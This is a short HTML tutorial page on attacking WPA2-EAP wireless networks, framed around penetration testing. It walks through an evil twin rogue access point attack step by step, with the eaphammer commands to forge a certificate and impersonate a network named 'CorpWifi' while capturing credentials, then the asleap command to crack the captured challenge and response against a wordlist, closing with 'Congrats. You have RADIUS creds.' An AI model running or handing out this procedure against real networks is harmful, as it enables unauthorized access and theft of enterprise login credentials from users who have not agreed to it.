<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Attacking WPA2-EAP</title>
</head><body><b><u>Attacking And Gaining Entry To WPA2-EAP Wireless Networks<br/>
</u></b><br/>
Rogue access point attacks are the bread and butter of modern wireless penetration tests. They can be used to perform stealthy man-in-the-middle attacks, steal RADIUS credentials, and trick users into interacting with malicious captive portals. Penetration testers can even use them for traditional functions such as deriving WEP keys and capturing WPA handshakes.<br/>
<br/>
<u>EVIL TWIN ATTACK USING Hostapd-WPE<br/>
</u><img src="image.png" /><br/>
To execute the attack, the attacker creates an access point using the same ESSID and channel as alegitimate AP on the target network. So long as the malicious access point has a more powerful signal strength than the legitimate AP, all devices connected to the target AP will drop and connect<br/>
to the attacker.<br/>
<br/>
1) Create a self signed certificate using eaphammer's --cert-wizard flag<br/>
root@localhost:~# ./eaphammer --cert-wizard<br/>
(follow instructions)<br/>
<br/>
Once we have created a believable certificate, we can proceed to launch an Evil Twin attack against on eo fthe target access points discovered in the last section. <br/>
<br/>
<br/>
2) Launch attack<br/>
:~# ./eaphammer -i wlan0 --channel 4 --auth ttls --wpa 2 --essid CorpWifi --creds<br/>
<br/>
You should soon see usernames, challenges and responses shown in terminal.<br/>
<br/>
3) Pass data to <u>asleap</u>&nbsp;to obtain a valid set of RADIUS credentials. <br/>
root@localhost:~# asleap –C &lt;challenge&gt; -R &lt;response&gt; -W &lt;wordlist&gt;<br/>
<br/>
<b>Congrats. You have RADIUS creds.&#09;</b></body></html>